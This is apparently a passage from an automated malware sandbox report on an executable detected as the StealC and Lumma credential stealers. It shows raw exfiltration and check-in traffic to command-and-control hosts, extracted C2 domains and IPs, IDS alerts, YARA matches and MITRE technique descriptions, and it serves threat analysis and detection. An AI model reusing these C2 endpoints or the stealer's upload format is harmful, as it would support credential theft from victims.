2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: 2d 2d 37 34 52 57 52 34 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 39 36 37 34 30 33 31 43 43 37 45 44 34 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 37 34 52 57 52 34 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 34 52 57 52 34 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 37 34 52 57 52 34 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --74RWR44EContent-Disposition: form-data; name="hwid"A449674031CC7ED463CFCF7E6C45F838--74RWR44EContent-Disposition: form-data; name="pid"1--74RWR44EContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--74RWR44EContent-Di
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: 46 2c 7e 50 e0 02 48 7e 1a 15 13 9b b0 be e3 1f b7 de bd d7 99 f3 37 76 21 74 01 d1 a8 4f b7 a4 b6 f0 f3 9d 55 c4 15 8e ca 92 4c 88 98 7e cc ac d0 9f 9a df 4e aa 66 56 8a b1 84 0f 89 ae f2 82 41 4e 2f 6c af d3 6a 3e bb a2 bd af 5d d8 d1 b9 1c 03 ce a6 8e 65 ad 1f 62 d9 a0 0d 2c c2 89 8f 14 6e 54 7d 77 38 c9 45 b7 b9 b2 a7 da 04 93 86 20 da 74 bd 5a b5 65 09 72 44 4f 8c 0a cd 4e a8 2f 4e 8b d3 29 df 48 df 8c 1a d3 d9 cd 98 94 70 79 a5 ac 15 e5 03 7b 7a 20 ea 77 4c 32 30 6a 83 39 89 89 a7 0f 37 b2 e9 fa e1 e7 a2 fe 9a 3f de a6 0d a1 17 7d de 9c 86 ca 9b bc e2 20 17 94 08 9d f6 0c 41 63 11 bb 1f fc 00 3b a2 ca b8 e8 f7 c5 a9 53 83 fb 20 fb c8 b2 9d 96 3f 94 51 76 38 fc e2 2f ba df 72 9b 12 0a 16 ef 3b f5 45 1d ad 08 22 d7 17 9e 26 39 78 c7 3e ab d1 3f 0a c6 Data Ascii: F,~PH~7v!tOUL~NfVAN/lj>]eb,nT}w8E tZerDON/N)Hpy{z wL20j97?} Ac;S ?Qv8/r;E"&9x>?
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: 98 80 9d f1 c0 7e 94 b7 1a 81 0b 85 c6 71 73 51 39 6a a9 2c e3 d5 52 56 20 c5 0e 8c b4 63 a2 fd c5 0e de 36 24 a8 39 84 13 6c a6 0d 44 4c 35 d3 58 9d 60 75 55 6a 38 50 21 2a b0 17 9d bd 62 be dc 9c 02 bb 6e ff 18 a0 9c f7 b4 0f 37 6c 0c 63 67 73 02 bf 3f b9 c5 70 01 5b cc 63 38 c4 91 eb 75 78 66 d0 05 62 55 19 dd ce 3f f5 ae cc fc 06 56 fa 65 07 02 12 d6 c0 99 bc 0e 7d 83 10 93 29 f1 04 84 2e 1a ee e5 76 9e aa 66 69 fd a8 18 57 7c e9 65 47 1f de 0f 8a b8 d7 72 aa c5 38 e1 b6 85 56 03 2d 08 e6 e0 60 07 3f 96 c8 92 30 2b b7 94 e5 d3 37 4b ce 4e 7f 1e c4 96 c1 ad 36 2c b0 5d b7 d3 8c c0 a5 28 02 a5 e5 15 ab 7c 6c 64 3b 0d 44 e0 24 c3 03 1d 52 29 91 41 d6 d8 7a 9f bf 3d 70 41 c6 4b 93 87 a7 fc 86 b7 9e e4 0c ef 3a 3e fd df d5 ae b9 22 e7 96 d3 83 c7 2e 30 68 Data Ascii: ~qsQ9j,RV c6$9lDL5X`uUj8P!*bn7lcgs?p[c8uxfbU?Ve}).vfiW\|eGr8V-`?0+7KN6,](\|ld;D$R)Az=pAK:>".0h
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: f7 68 0a cd 0a 03 35 ee 74 c9 fe f5 a3 a0 58 64 ec 02 a0 a5 de 1f 22 1f 4f a4 69 b8 d3 2d 0f bb d5 01 4a 42 19 90 83 28 15 29 53 e9 2f d4 5a 9e ef 07 46 45 d9 27 03 00 7e d4 65 66 2e fe 16 2e 79 8a 12 1a 4d 89 26 63 00 3f 32 1e 11 97 0d ac c7 bf 48 b2 67 64 95 49 22 5a 08 ba 5b a8 bd 33 f9 81 b0 18 80 4d ef 5b 7b 29 96 ac 55 e8 3f fd 99 ce 14 f0 26 d4 04 31 0f b4 5e 3d 63 9c e7 39 77 f3 7d 39 39 90 e3 c2 07 47 c2 2e 42 b0 ab ab 10 12 88 b2 97 d3 40 e1 38 dd c1 18 41 89 0e f4 df 12 59 98 19 22 c2 cc 28 c6 e9 bb e2 4a ec 3f 97 9d 84 4d f9 9c 91 52 ea 99 ee 29 ca 27 a8 86 b8 8c dc 0b 72 d0 69 f2 fc ac 54 f8 21 ad 05 dd fc 93 63 f9 b2 fe a9 5c 1b 20 52 0c ca b8 87 30 37 dc 91 63 69 b4 d6 fb 00 47 c3 d2 6f 7e 89 58 bd 05 92 49 c9 ab 5b 68 d8 e1 ad f8 9c 02 18 Data Ascii: h5tXd"Oi-JB()S/ZFE'~ef..yM&c?2HgdI"Z[3M[{)U?&1^=c9w}99G.B@8AY"(J?MR)'riT!c\ R07ciGo~XI[h
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: e6 cd 09 ed 56 5d 91 ad 7d 08 c4 67 d3 2e 3b e7 f0 ac 83 38 b9 bf b3 03 99 4f a8 3c e3 91 4d 6f 35 bb 63 9a 7c f3 a2 e0 91 7e e1 66 c6 7e 29 c2 42 cf 1b f2 ec 35 c2 a0 15 44 8d 09 94 5c 12 91 1e 1b de e1 9e 99 ce 30 f7 c9 59 20 cc 01 db 3d f4 be 5d 73 ff 7a 2c 1d ff 79 1c 5f 71 d7 9d c8 8b 98 0b 7e 1c 82 06 65 28 3d 86 68 77 fc 62 b7 72 93 21 cd c0 8c 2c c3 da c5 ae d7 ee 55 58 7b 14 40 2b 97 91 7a 1f 40 6f 39 02 eb 5c 36 4f 51 ca 50 75 37 9a cc bf dd 10 e2 a4 24 f4 e5 de f9 8b b3 59 ed 2e ea c8 ac c1 24 0d 62 cc 5d ed 16 97 c1 09 60 6b 47 6d 08 e6 df 2a 46 a6 7a d5 46 87 3d b6 51 f2 9b 42 8b 57 89 59 a7 85 dd e0 1c 1f 92 ac d3 c3 18 17 0a 97 d9 41 f2 96 bd d3 c2 5f 64 37 fa 44 9b 19 7f 1e 10 68 fa 14 83 48 63 3d 9e 6b e6 35 c6 e0 82 55 e0 80 19 1b 22 83 Data Ascii: V]}g.;8O<Mo5c\|~f~)B5D\0Y =]sz,y_q~e(=hwbr!,UX{@+z@o9\6OQPu7$Y.$b]`kGm*FzF=QBWYA_d7DhHc=k5U"
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: 97 d7 3d 9e 44 02 2f 27 4d e0 a6 cc 0d b6 ea a7 2a c1 7c 84 7f 9c 30 3c f4 cc b3 46 e6 23 77 73 ba ed 1f 4b 43 19 07 82 c9 0e f1 42 ce 9c 31 06 d2 48 fd 52 7e 02 b7 90 67 e4 cb aa 77 d5 e5 f2 0d 36 cc 2f 4c f3 b6 87 4e 29 5b 24 6a 27 a8 e9 c8 26 1c 36 1c 39 f6 ce 9c c6 aa de 3e 5b f6 61 5e fb e2 38 46 3a d2 c4 8a 92 c9 68 1e fc 49 a3 ff 83 87 c9 1a b4 25 0c aa d0 91 ff db 48 3b 23 c9 b7 76 dd 83 f5 2f 92 56 1c be 50 28 08 26 8c 28 19 50 66 47 e3 fa 3b ac 51 9d 12 08 f9 f8 5a ff c5 4f 19 ea 36 1f ed 26 ad f0 b4 b2 8a 22 74 68 06 8f b8 64 41 a4 54 bd ad 85 e3 f5 32 0b 66 28 69 34 b2 3b da a3 63 d5 59 81 d6 89 96 be 0b ec 80 39 39 77 21 09 58 3d 8b e8 58 74 76 a0 59 61 ba a3 52 c3 b0 68 4d 11 92 f5 d1 e7 c1 56 bf 9f 77 3c b9 4c 3f 84 74 42 49 17 30 9e c3 ba Data Ascii: =D/'M*\|0<F#wsKCB1HR~gw6/LN)[$j'&69>[a^8F:hI%H;#v/VP(&(PfG;QZO6&"thdAT2f(i4;cY99w!X=XtvYaRhMVw<L?tBI0
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: a4 75 57 7a bd af 9f 64 66 25 57 5a aa be ca 3f 9a 98 5d 73 02 1b bf 2a 93 f3 d6 eb b9 75 6b a8 26 da fd 10 b7 48 8d 79 50 8d 2f cb 5a 03 b5 d1 fe 3b a7 ee 69 25 94 93 51 da 0f 99 d7 99 25 ec ca 5b 6e 95 7c e0 d2 6f ab 10 5a f3 41 8b 3b d6 c4 b6 4f dd c8 21 b6 96 0b 64 ef 39 b9 5e d1 c2 56 a7 c8 66 a6 bb 23 f6 ad 64 c7 59 0e 04 63 17 27 50 a5 68 62 a7 84 39 90 be bb 0d 07 bb 37 18 a0 db 0d 4f 5b c9 88 78 55 d0 be 84 4b 40 24 69 71 4a e0 0c 9d f5 d9 14 d6 eb d4 bf a7 b9 9f fc 06 f2 0a cd 32 78 cf 12 da 48 96 74 c2 f1 51 b9 96 df 08 e6 b8 96 5b ec 09 f7 41 b1 d9 fe b2 e0 af 80 99 d1 2f 86 64 2a 9b 69 8a 30 90 3a 67 0d c3 99 85 03 55 3d 74 43 89 4e 71 ce 6f 1d 9e 38 08 0b a0 41 99 e9 9e fc 40 6c 4c ed 6a 75 f7 40 e1 e5 92 7a 07 08 49 08 64 41 fc 48 08 fa 90 Data Ascii: uWzdf%WZ?]suk&HyP/Z;i%Q%[n\|oZA;O!d9^Vf#dYc'Phb97O[xUK@$iqJ2xHtQ[A/di0:gU=tCNqo8A@lLju@zIdAH
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: d8 66 69 08 5c b7 70 b0 55 8c 7c 15 37 df d9 a6 cb d8 5c ff e3 a0 88 3b 53 1c cd b3 af 67 f0 e5 ac 49 56 fd 6a f1 d6 dc b2 9b ea a2 35 93 67 ec de 26 85 f2 d0 e2 5e e5 4c e7 62 bb 8c 68 3d a7 14 2f 6b e7 f7 02 02 79 d7 50 ef 18 f5 ad 12 c5 da d8 37 3c 77 f3 74 78 ef 6e c5 3e 86 65 ea d0 59 44 a7 6c 02 ee 19 fb a0 b9 d9 f3 d3 56 43 b8 66 c0 54 ab 39 a0 77 27 be 8e d2 2a d8 b0 5e 6c 38 bf f6 8d e9 66 49 8b 34 4c 84 fb bf 89 62 fe 04 61 68 44 4e ec 8e ef e1 2c 0d 89 a7 40 86 5f e5 d7 b1 ab 6f 71 73 2e ce 73 1c 9e 8e 5a 5f 21 d4 3c 2c 74 f0 3d 6b 14 da d5 c1 b1 eb 67 26 bc f4 49 f6 1e aa 57 b0 ee 0b 4a da fc bc 58 84 11 da 4c a0 1b ce c4 78 cd 75 bd 6b 53 d7 e0 5c a9 9e ce fc e0 22 b2 d8 d6 48 a2 55 db 64 ca 5f 3e 5b b6 17 04 76 7d 99 0b 47 3c 55 ab 8f 85 68 Data Ascii: fi\pU\|7\;SgIVj5g&^Lbh=/kyP7<wtxn>eYDlVCfT9w'*^l8fI4LbahDN,@_oqs.sZ_!<,t=kg&IWJXLxukS\"HUd_>[v}G<Uh
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: a0 96 0e 2a 65 d1 a9 75 2b bb 28 b9 08 f2 30 2b fb 59 7d 48 c0 7e 2f 11 cd ca b9 47 b5 97 a9 b3 d0 74 61 7b cf 11 94 9d 4a 27 66 87 7e 99 a7 12 63 36 41 b4 3b 7c 9e 8e 2d 73 91 8f ce fb 64 56 2c d1 60 42 29 45 db 83 5c 1f cc 2f 76 9e ae 16 9f 18 a8 93 c4 81 5c 5a b2 36 6c f9 db bd 61 52 bf 15 25 33 92 dc 2a d4 20 d6 dd 87 cf c7 28 4b 10 09 13 68 f1 8d 45 39 6b da da 2f 7b 7b 62 e6 61 5c bf d4 e5 c1 28 97 ef 1f 5c 32 78 d1 a9 c1 15 cd 5a c5 4c 95 96 0e 59 24 e4 09 62 fd 02 dc 13 a3 f6 1f c8 3f ba 6b 6a 81 f7 2d 74 50 17 e4 3a c1 3e 38 fe f8 2e 26 2f 9b 26 a0 d5 27 f3 d6 0f 7d ad 84 e0 a9 64 08 cc d8 cc 6f e6 4b 0a 8b 4e 66 3e 23 ac cd e6 a6 41 6f 6e c8 b8 4d 74 00 26 df 3e a8 97 7b 02 45 cf 10 34 77 5a ab b5 b9 8b 5b 78 3b 72 3b 35 28 46 45 4b a5 c5 14 0e Data Ascii: eu+(0+Y}H~/Gta{J'f~c6A;\|-sdV,`B)E\/v\Z6laR%3 (KhE9k/{{ba\(\2xZLY$b?kj-tP:>8.&/&'}doKNf>#AonMt&>{E4wZ[x;r;5(FEK
2024-11-19 20:02:31 UTC	15331	OUT	Data Raw: 0c d0 de 9d 5e f5 cb 76 79 72 7e 62 be 8a 5d 19 7d bf d5 88 71 3d a4 2f eb fd 12 3b 60 f5 7e 1a 34 a4 35 cd 73 b2 46 8a 4a f5 1e 83 d8 18 70 ab 84 a5 27 08 b1 99 4b bf fe df e2 31 0f 18 70 0c b8 e1 dc 14 68 33 25 8a 39 cf 37 0b b7 99 45 d3 73 56 8f 02 ab aa 99 d9 cc d5 ef f0 43 61 20 da 95 eb 57 bf 2f 17 42 06 48 96 7c 04 54 23 13 d9 d1 da 39 e9 02 84 cc f2 c1 4d c5 87 7b 78 47 04 54 9c b9 4e 7d db 0c 53 dd 14 f5 bd 45 6e e1 42 e3 17 b5 4a 87 67 8f 8f 08 d8 9e 6d e2 e5 4c 9d fb bc 43 b4 fe dd 28 2c e3 c4 05 1c 24 da 5c e2 f3 2c fe 49 78 da 0d 39 20 40 37 7c 2c 09 5e bf 14 1a de 4b 68 08 e6 61 9c d1 40 ea c3 34 8f 5b f9 26 69 24 ba 39 c8 bc 88 02 57 64 38 38 25 34 13 26 f2 02 4f a3 33 20 db 0b 40 73 d7 c7 8b 7f 08 5d 83 c8 de f0 a7 6b 11 73 24 04 28 14 d3 Data Ascii: ^vyr~b]}q=/;`~45sFJp'K1ph3%97EsVCa W/BH\|T#9M{xGTN}SEnBJgmLC(,$\,Ix9 @7\|,^Kha@4[&i$9Wd88%4&O3 @s]ks$(
2024-11-19 20:02:35 UTC	990	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d7s5qk2epc6im0s2eqsmcvvq5n; expires=Sat, 15-Mar-2025 13:49:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D48HqzCi0BQXFU885ViGPHwlnnm%2BrlQtVrb%2BbjAEk1WApFzjXl7msPfsKREv78KscagVy9k6jREJsPLcjW%2B36AXf8uGwXywH4qEchZMeMtycM9iKDlKWjHO8NZM3%2Fdvc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc64cd828c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1830&sent=282&recv=600&lost=0&retrans=0&sent_bytes=2829&recv_bytes=585983&delivery_rate=1586956&cwnd=196&unsent_bytes=0&cid=a6957e1bbe90df36&ts=4201&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49832	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:36 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: cook-rain.sbs
2024-11-19 20:02:36 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 41 34 34 39 36 37 34 30 33 31 43 43 37 45 44 34 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=A449674031CC7ED463CFCF7E6C45F838
2024-11-19 20:02:36 UTC	984	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s8fsgf7n4opku2ohi7ems9s9hi; expires=Sat, 15-Mar-2025 13:49:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lIa2zwaHN4NJjoMCy3L%2BETuGEt2nj6ishjzYbOz%2FjSAReeYsoD8t0X5pfGqNP%2BY3uX2CJ8WQGX4eetuS5CVwdq92kOWPAvrO0dmgTbRU%2FN3H80WBN6fmwZuOUrRLC%2B2A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc8249cb430d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=985&delivery_rate=1723730&cwnd=222&unsent_bytes=0&cid=1ce032569ceb8814&ts=413&x=0"
2024-11-19 20:02:36 UTC	214	IN	Data Raw: 64 30 0d 0a 70 75 46 6e 6f 5a 33 4a 73 4c 46 36 6f 68 6c 30 68 71 56 35 75 44 62 5a 2f 36 6c 74 4a 4e 56 42 43 37 4a 39 56 77 53 61 6d 6b 6a 39 6d 6b 58 55 76 2f 4f 53 32 51 37 57 61 55 37 61 69 69 57 58 42 2b 48 4b 68 31 38 56 34 47 38 36 67 30 35 35 4e 61 7a 47 5a 38 6d 48 41 66 32 79 72 64 58 58 56 4d 64 68 45 61 53 4a 57 39 35 43 2b 38 57 5a 51 51 61 77 59 7a 47 44 41 48 74 2f 75 4f 39 71 6e 4d 4d 50 31 65 6d 35 69 75 31 56 2f 6a 5a 46 76 70 42 58 69 67 66 73 30 5a 68 63 46 2f 74 77 50 65 35 53 4a 48 44 2f 2b 79 58 36 7a 68 58 41 38 36 33 66 33 46 54 48 59 52 47 6b 69 56 76 65 51 76 76 46 6d 55 45 47 73 47 4d 78 67 77 41 4b 0d 0a Data Ascii: d0puFnoZ3JsLF6ohl0hqV5uDbZ/6ltJNVBC7J9VwSamkj9mkXUv/OS2Q7WaU7aiiWXB+HKh18V4G86g055NazGZ8mHAf2yrdXXVMdhEaSJW95C+8WZQQawYzGDAHt/uO9qnMMP1em5iu1V/jZFvpBXigfs0ZhcF/twPe5SJHD/+yX6zhXA863f3FTHYRGkiVveQvvFmUEGsGMxgwAK
2024-11-19 20:02:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	2
Start time:	15:02:13
Start date:	19/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa70000
File size:	1'814'016 bytes
MD5 hash:	E26AD37F58EAF809521E5050BEBF9BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1635741412.0000000005BD1000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.1592515790.00000000080B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: http://185.215.113.206/405117-2476756634-1003bO	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/S/-3	Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/api=	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/7J	Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/apiC	Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/apiecked	Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/;	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exebKit/537.36	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/def.exeO	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/ntdesk	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/tp	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php?#	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/8L$3	Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/apix	Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/apiq	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/x4e3	Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/on	Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/D(	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/qd#3	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/zwn35	Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/v1=	Avira URL Cloud: Label: malware

Source: file.exe.7616.2.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe.7616.2.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: p3ar11fter.sbs
Source: Malware configuration extractor	URLs: peepburry828.sbs
Source: Malware configuration extractor	URLs: p10tgrace.sbs
Source: Malware configuration extractor	URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor	URLs: processhol.sbs

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49876 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49725 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49725 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49832 -> 188.114.97.3:443

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

